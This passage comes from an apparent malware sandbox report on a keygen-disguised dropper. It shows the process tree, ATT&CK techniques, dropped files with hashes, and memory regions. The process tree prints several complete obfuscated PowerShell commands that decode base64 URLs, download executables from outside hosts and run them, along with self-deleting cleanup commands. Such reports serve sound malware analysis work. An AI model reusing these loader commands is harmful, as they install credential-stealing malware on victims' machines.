                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:240
                        • C:\Users\Public\qrw.exe
                          "C:\Users\Public\qrw.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2920
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                            6⤵
                            • Loads dropped DLL
                            PID:2992
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2928
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                8⤵
                                • Loads dropped DLL
                                PID:968
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2852
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1540
                              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                8⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:2424
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2424 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\228798328848967\\* & exit
                                  9⤵
                                    PID:1052
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /pid 2424
                                      10⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2472
                            • C:\Users\Public\qrw.exe
                              "C:\Users\Public\qrw.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2064
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\53FA.tmp\b1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:332
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:832
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout 2
                        3⤵
                        • Delays execution with timeout.exe
                        PID:996
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\53FA.tmp\ba.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:632
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1472
                          • C:\Users\Public\amh.exe
                            "C:\Users\Public\amh.exe"
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2976
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:3052
                              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:2176
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2176 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\953567857350242\\* & exit
                                  8⤵
                                    PID:2096
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /pid 2176
                                      9⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2108
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:1468
                                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:560
                              • C:\Users\Public\amh.exe
                                "C:\Users\Public\amh.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2084
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\53FA.tmp\ba1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:1072
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1580

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Defense Evasion

                    Modify Registry

                    6
                    T1112

                    Disabling Security Tools

                    2
                    T1089

                    Install Root Certificate

                    1
                    T1130

                    Credential Access

                    Credentials in Files

                    3
                    T1081

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Collection

                    Data from Local System

                    3
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_54946938-214a-4229-8699-eb043d1cb765
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_91ef1f50-1c4b-425f-812e-54511eafeab8
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a534a877-2606-4b9b-9d6d-40bc8142e3af
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cd127214-c248-4e14-90d8-6f8c63edf4b6
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d85a2aea-c54d-4491-a79b-12485bec96b5
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Temp\1ArREUxbRo.exe
                    • C:\Users\Admin\AppData\Local\Temp\1ArREUxbRo.exe
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\b.hta
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\b1.hta
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\ba.hta
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\ba1.hta
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\m.hta
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\m1.hta
                    • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\start.bat
                    • C:\Users\Admin\AppData\Local\Temp\9ttrVNjHzU.exe
                    • C:\Users\Admin\AppData\Local\Temp\9ttrVNjHzU.exe
                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                    • C:\Users\Admin\AppData\Local\Temp\Xovy2qwudi.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\Xovy2qwudi.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\eYu7Z9kyxR.exe
                    • C:\Users\Admin\AppData\Local\Temp\eYu7Z9kyxR.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Public\Natso.bat
                    • C:\Users\Public\amh.exe
                    • C:\Users\Public\amh.exe
                    • C:\Users\Public\amh.exe
                    • C:\Users\Public\ntz.exe
                    • C:\Users\Public\ntz.exe
                    • C:\Users\Public\ntz.exe
                    • C:\Users\Public\qrw.exe
                    • C:\Users\Public\qrw.exe
                    • C:\Users\Public\qrw.exe
                    • C:\Windows\temp\x11s3qnj.inf
                    • \??\PIPE\lsarpc
                    • \??\PIPE\srvsvc
                    • \??\PIPE\srvsvc
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\sqlite3.dll
                    • \Users\Admin\AppData\Local\Temp\1ArREUxbRo.exe
                    • \Users\Admin\AppData\Local\Temp\53FA.tmp\Keygen.exe
                    • \Users\Admin\AppData\Local\Temp\9ttrVNjHzU.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\Xovy2qwudi.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\eYu7Z9kyxR.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Public\amh.exe
                    • \Users\Public\amh.exe
                    • \Users\Public\ntz.exe
                    • \Users\Public\ntz.exe
                    • \Users\Public\qrw.exe
                    • memory/240-23-0x0000000000000000-mapping.dmp
                    • memory/240-143-0x0000000006660000-0x0000000006661000-memory.dmp
                      Filesize

                      4KB

                    • memory/240-34-0x0000000070A80000-0x000000007116E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/332-18-0x0000000000000000-mapping.dmp
                    • memory/560-182-0x000000000041A684-mapping.dmp
                    • memory/632-27-0x0000000000000000-mapping.dmp
                    • memory/832-50-0x00000000028D0000-0x00000000028D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/832-220-0x0000000006650000-0x0000000006651000-memory.dmp
                      Filesize

                      4KB

                    • memory/832-196-0x0000000006510000-0x0000000006511000-memory.dmp
                      Filesize

                      4KB
